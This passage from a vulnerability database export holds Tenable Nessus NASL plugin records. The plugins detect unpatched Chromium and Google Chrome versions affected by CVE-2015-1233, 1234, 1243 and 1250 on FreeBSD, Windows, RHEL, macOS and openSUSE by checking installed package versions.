"https://www.tenable.com/plugins/nessus/83130", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83130);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-1243\", \"CVE-2015-1250\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (210f80b9-ede4-11e4-81c4-00262d5ed8ee)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n5 security fixes in this release, including :\n\n- [453279] High CVE-2015-1243: Use-after-free in DOM. Credit to Saif\nEl-Sherei.\n\n- [481777] CVE-2015-1250: Various fixes from internal audits, fuzzing\nand other initiatives.\"\n );\n # http://googlechromereleases.blogspot.nl/2015/04/stable-channel-update_28.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d4670bf\"\n );\n # https://vuxml.freebsd.org/freebsd/210f80b9-ede4-11e4-81c4-00262d5ed8ee.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0be1b4fb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-npapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<42.0.2311.135\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-npapi<42.0.2311.135\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<42.0.2311.135\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:53:03", "description": "The version of Google Chrome installed on the remote Windows host is prior to 41.0.2272.118. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists due to bugs in the V8, Gamepad, and IPC components. (CVE-2015-1233)\n\n - A buffer overflow vulnerability exists due to a race condition in the GPU component. (CVE-2015-1234)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-02T00:00:00", "type": "nessus", "title": "Google Chrome < 41.0.2272.118 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_41_0_2272_118.NASL", "href": "https://www.tenable.com/plugins/nessus/82534", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82534);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-1233\", \"CVE-2015-1234\");\n script_bugtraq_id(73484, 73486);\n\n script_name(english:\"Google Chrome < 41.0.2272.118 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 41.0.2272.118. It is, therefore, affected by the following\nvulnerabilities :\n\n - A remote code execution vulnerability exists due to bugs\n in the V8, Gamepad, and IPC components. (CVE-2015-1233)\n\n - A buffer overflow vulnerability exists due to a race\n condition in the GPU component. (CVE-2015-1234)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/04/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6c579b1f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 41.0.2272.118 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1233\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'41.0.2272.118', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:00", "description": "The version of Google Chrome on the remote host is prior to 41.0.2272.118 and is affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists due to bugs in the V8, Gamepad, and IPC components. (CVE-2015-1233)\n\n - A buffer overflow vulnerability exists due to a race condition in the GPU component. (CVE-2015-1234)", "cvss3": {"score": null, "vector": null}, "published": "2015-04-24T00:00:00", "type": "nessus", "title": "Google Chrome < 41.0.2272.118 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "8706.PASL", "href": "https://www.tenable.com/plugins/nnm/8706", "sourceData": "Binary data 8706.pasl", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-25T13:55:34", "description": "Updated chromium-browser packages that fix two security issues are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash or, potentially, execute arbitrary code with the privileges of the user running Chromium. (CVE-2015-1233, CVE-2015-1234)\n\nAll Chromium users should upgrade to these updated packages, which contain Chromium version 41.0.2272.118, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the changes to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-07T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2015:0778)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.6"], "id": "REDHAT-RHSA-2015-0778.NASL", "href": "https://www.tenable.com/plugins/nessus/82619", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0778. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82619);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2015-1233\", \"CVE-2015-1234\");\n script_xref(name:\"RHSA\", value:\"2015:0778\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2015:0778)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated chromium-browser packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Chromium to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running Chromium. (CVE-2015-1233, CVE-2015-1234)\n\nAll Chromium users should upgrade to these updated packages, which\ncontain Chromium version 41.0.2272.118, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the\nchanges to take effect.\"\n );\n # http://googlechromereleases.blogspot.com/2015/04/stable-channel-update.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6c579b1f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1233\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1234\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0778\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-41.0.2272.118-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-41.0.2272.118-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-41.0.2272.118-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-41.0.2272.118-1.el6_6\", allowmaj:TRUE)) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T13:55:34", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 41.0.2272.118. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists due to bugs in the V8, Gamepad, and IPC components. (CVE-2015-1233)\n\n - A buffer overflow vulnerability exists due to a race condition in the GPU component. (CVE-2015-1234)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-02T00:00:00", "type": "nessus", "title": "Google Chrome < 41.0.2272.118 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_41_0_2272_118.NASL", "href": "https://www.tenable.com/plugins/nessus/82535", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82535);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2015-1233\", \"CVE-2015-1234\");\n script_bugtraq_id(73484, 73486);\n\n script_name(english:\"Google Chrome < 41.0.2272.118 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 41.0.2272.118. It is, therefore, affected by the following\nvulnerabilities :\n\n - A remote code execution vulnerability exists due to bugs\n in the V8, Gamepad, and IPC components. (CVE-2015-1233)\n\n - A buffer overflow vulnerability exists due to a race\n condition in the GPU component. (CVE-2015-1234)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/04/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6c579b1f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 41.0.2272.118 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1233\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'41.0.2272.118', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T13:56:24", "description": "Chromium was updated to 41.0.2272.118 to fix two security issues.\n\nThe following vulnerabilities were fixed :\n\n - A combination of V8, Gamepad and IPC bugs could lead to remote code execution outside of the sandbox (CVE-2015-1233, boo#925713)\n\n - Buffer overflow via race condition in GPU (CVE-2015-1234, boo#925714)", "cvss3": {"score": null, "vector": null}, "published": "2015-04-09T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2015-298)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium-desktop-kde", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-298.NASL", "href": "https://www.tenable.com/plugins/nessus/82655", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-298.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82655);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1233\", \"CVE-2015-1234\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2015-298)\");\n script_summary(english:\"Check for the openSUSE-2015-298 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to 41.0.2272.118 to fix two security issues.\n\nThe following vulnerabilities were fixed :\n\n - A combination of V8, Gamepad and IPC bugs could lead to\n remote code execution outside of the sandbox\n (CVE-2015-1233, boo#925713)\n\n - Buffer overflow via race condition in GPU\n (CVE-2015-1234, boo#925714)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=925713\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=925714\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-41.0.2272.118-75.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-debuginfo-41.0.2272.118-75.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-41.0.2272.118-75.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debuginfo-41.0.2272.118-75.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debugsource-41.0.2272.118-75.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-gnome-41.0.2272.118-75.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-kde-41.0.2272.118-75.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-41.0.2272.118-75.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-debuginfo-41.0.2272.118-75.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-41.0.2272.118-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-debuginfo-41.0.2272.118-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-41.0.2272.118-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debuginfo-41.0.2272.118-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debugsource-41.0.2272.118-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-gnome-41.0.2272.118-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-kde-41.0.2272.118-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-41.0.2272.118-20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-debuginfo-41.0.2272.118-20.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 7.5, "vector": 